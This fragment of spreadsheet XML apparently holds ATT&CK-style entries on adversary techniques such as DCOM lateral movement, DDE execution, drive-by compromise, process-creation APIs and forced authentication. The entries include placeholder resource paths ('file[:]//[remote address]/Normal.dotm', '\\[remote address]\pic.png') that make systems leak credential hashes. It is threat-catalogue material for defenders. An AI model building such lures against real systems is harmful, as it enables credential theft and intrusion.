        <family val="2"/>
      </rPr>
      <t>. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>97</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Adversaries may also used compressed or archived scripts, such as Javascript.</t>
    </r>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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T1175</t>
  </si>
  <si>
    <t>Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model (COM)13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t>
  </si>
  <si>
    <r>
      <t>Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>9899100</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> By default, only Administrators may remotely activate and launch COM objects through DCOM.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>101</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> as well as other Windows objects that contain insecure methods.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>102103</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> DCOM can also execute macros in existing documents</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>104</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and may also invoke </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Dynamic Data Exchange</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> (DDE) execution directly through a COM created instance of a Microsoft Office application</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>105</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, bypassing the need for a malicious document.</t>
    </r>
  </si>
  <si>
    <t>T1172</t>
  </si>
  <si>
    <t>Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS.106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</si>
  <si>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T1189</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</si>
  <si>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t>
  </si>
  <si>
    <t>Multiple ways of delivering exploit code to a browser exist, including:</t>
  </si>
  <si>
    <t>A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, cross-site scripting.</t>
  </si>
  <si>
    <t>Malicious ads are paid for and served through legitimate ad providers.</t>
  </si>
  <si>
    <t>Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).</t>
  </si>
  <si>
    <t>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occurring.107</t>
  </si>
  <si>
    <t>Typical drive-by compromise process:</t>
  </si>
  <si>
    <t>1. A user visits a website that is used to host the adversary controlled content.</t>
  </si>
  <si>
    <t>2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.</t>
  </si>
  <si>
    <t>The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.</t>
  </si>
  <si>
    <t>3. Upon finding a vulnerable version, exploit code is delivered to the browser.</t>
  </si>
  <si>
    <t>4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.</t>
  </si>
  <si>
    <t>In some cases a second visit to the website after the initial scan is required before exploit code is delivered.</t>
  </si>
  <si>
    <t>Unlike Exploit Public-Facing Application, the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.</t>
  </si>
  <si>
    <t>T1173</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</si>
  <si>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</si>
  <si>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r>
      <t>Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>108109110</t>
    </r>
  </si>
  <si>
    <r>
      <t>Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>111112</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, directly or through embedded files</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>113</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>114</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.</t>
    </r>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>Adversaries may target user email to collect sensitive information from a target.</t>
  </si>
  <si>
    <t>Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.</t>
  </si>
  <si>
    <t>Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.</t>
  </si>
  <si>
    <t>Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters.115</t>
  </si>
  <si>
    <t>Additional Windows API calls that can be used to execute binaries include:116</t>
  </si>
  <si>
    <t>CreateProcessA() and CreateProcessW(),</t>
  </si>
  <si>
    <t>CreateProcessAsUserA() and CreateProcessAsUserW(),</t>
  </si>
  <si>
    <t>CreateProcessInternalA() and CreateProcessInternalW(),</t>
  </si>
  <si>
    <t>CreateProcessWithLogonW(), CreateProcessWithTokenW(),</t>
  </si>
  <si>
    <t>LoadLibraryA() and LoadLibraryW(),</t>
  </si>
  <si>
    <t>LoadLibraryExA() and LoadLibraryExW(),</t>
  </si>
  <si>
    <t>LoadModule(),</t>
  </si>
  <si>
    <t>LoadPackagedLibrary(),</t>
  </si>
  <si>
    <t>WinExec(),</t>
  </si>
  <si>
    <t>ShellExecuteA() and ShellExecuteW(),</t>
  </si>
  <si>
    <t>ShellExecuteExA() and ShellExecuteExW()</t>
  </si>
  <si>
    <t>T1129</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</si>
  <si>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API.117</t>
  </si>
  <si>
    <t>The module loader can load DLLs:</t>
  </si>
  <si>
    <t>via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;</t>
  </si>
  <si>
    <t>via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);</t>
  </si>
  <si>
    <t>via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;</t>
  </si>
  <si>
    <r>
      <t>via </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>&lt;file name="filename.extension" loadFrom="fully-qualified or relative pathname"&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.</t>
    </r>
  </si>
  <si>
    <t>Adversaries can use this functionality as a way to execute arbitrary code on a system.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1041</t>
  </si>
  <si>
    <t>Data exfiltration is performed over the Command and Control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>T1011</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1190</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>118</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, standard services (like SMB</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>119</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>120</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Depending on the flaw being exploited this may include </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Exploitation for Defense Evasion</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. For websites and databases, the OWASP top 10 gives a good list of the top 10 most common web-based vulnerabilities.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>121</t>
    </r>
  </si>
  <si>
    <t>T1203</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</si>
  <si>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</si>
  <si>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Several types exist:</t>
  </si>
  <si>
    <t>Browser-based Exploitation</t>
  </si>
  <si>
    <r>
      <t>Web browsers are a common target through </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Drive-by Compromise</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Spearphishing Link</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.</t>
    </r>
  </si>
  <si>
    <t>Office Applications</t>
  </si>
  <si>
    <r>
      <t>Common office and productivity applications such as Microsoft Office are also targeted through </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Spearphishing Attachment</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Spearphishing Link</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Spearphishing via Service</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.</t>
    </r>
  </si>
  <si>
    <t>Common Third-party Applications</t>
  </si>
  <si>
    <t>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</si>
  <si>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T1212</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>122123</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Exploitation for credential access may also result in </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Privilege Escalation</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> depending on the process targeted or credentials obtained.</t>
    </r>
  </si>
  <si>
    <t>T1211</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1068</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</si>
  <si>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</si>
  <si>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T1210</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</si>
  <si>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</si>
  <si>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r>
      <t>An adversary may need to determine if the remote system is in a vulnerable state, which may be done through </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Network Service Scanning</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> or other </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Discovery</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
  </si>
  <si>
    <r>
      <t>There are several well-known vulnerabilities that exist in common services such as SMB</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>119</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and RDP</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>124</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> as well as applications that may be used within internal networks such as MySQL</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>118</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and web server services.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>120</t>
    </r>
  </si>
  <si>
    <t>Depending on the permissions level of the vulnerable remote service an adversary may achieve Exploitation for Privilege Escalation as a result of lateral movement exploitation as well.</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Windows Remote Management</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> can also be used externally. Adversaries may use remote services to access and persist within a network.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>125</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Access to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Valid Accounts</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as part of </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Redundant Access</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> during an operation.</t>
    </r>
  </si>
  <si>
    <t>T1181</t>
  </si>
  <si>
    <r>
      <t>Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>126</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>127128</t>
    </r>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <r>
      <t>Execution granted through EWM injection may take place in the address space of a separate live process. Similar to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Process Injection</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>9</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>129130</t>
    </r>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t>T1107</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>cmd</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>58</t>
    </r>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <r>
      <t>Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>131</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Utilities, such as NinjaCopy, exist to perform these actions in PowerShell.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>132</t>
    </r>
  </si>
  <si>
    <t>T1044</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</si>
  <si>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t>
  </si>
  <si>
    <t>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</si>
  <si>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Services</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Executable Installers</t>
  </si>
  <si>
    <r>
      <t>Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>%TEMP%</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <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t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>DLL Search Order Hijacking</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Bypass User Account Control</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Several examples of this weakness in existing common installers have been reported to software vendors.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>133134</t>
    </r>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.</t>
  </si>
  <si>
    <t>Example utilities used to obtain this information are dir and tree.135 Custom tools may also be used to gather file and directory information and interact with the Windows API.</t>
  </si>
  <si>
    <t>Mac and Linux</t>
  </si>
  <si>
    <r>
      <t>In Mac and Linux, this kind of discovery is accomplished with the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>ls</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>find</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>locate</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> commands.</t>
    </r>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>136</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>137138</t>
    </r>
  </si>
  <si>
    <r>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>139</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> With access to the credential hash, an adversary can perform off-line </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Brute Force</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> cracking to gain access to plaintext credentials, or reuse it for </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Pass the Hash</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>140</t>
    </r>
  </si>
  <si>
    <t>There are several different ways this can occur.141 Some specifics from in-the-wild use include:</t>
  </si>
  <si>
    <t>A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened. The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request.142</t>
  </si>
  <si>
    <t>A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials.142</t>
  </si>
  <si>
    <t>T1061</t>
  </si>
  <si>
    <t>Cause a binary or script to execute based on interacting with the file through a graphical user interface (GUI) or in an interactive remote session such as Remote Desktop Protocol.</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>143</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, man-in-the middle encryption breaking</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>144</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, keystroke injection</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>145</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, kernel memory reading via DMA</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>146</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, adding new wireless access to an existing network</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
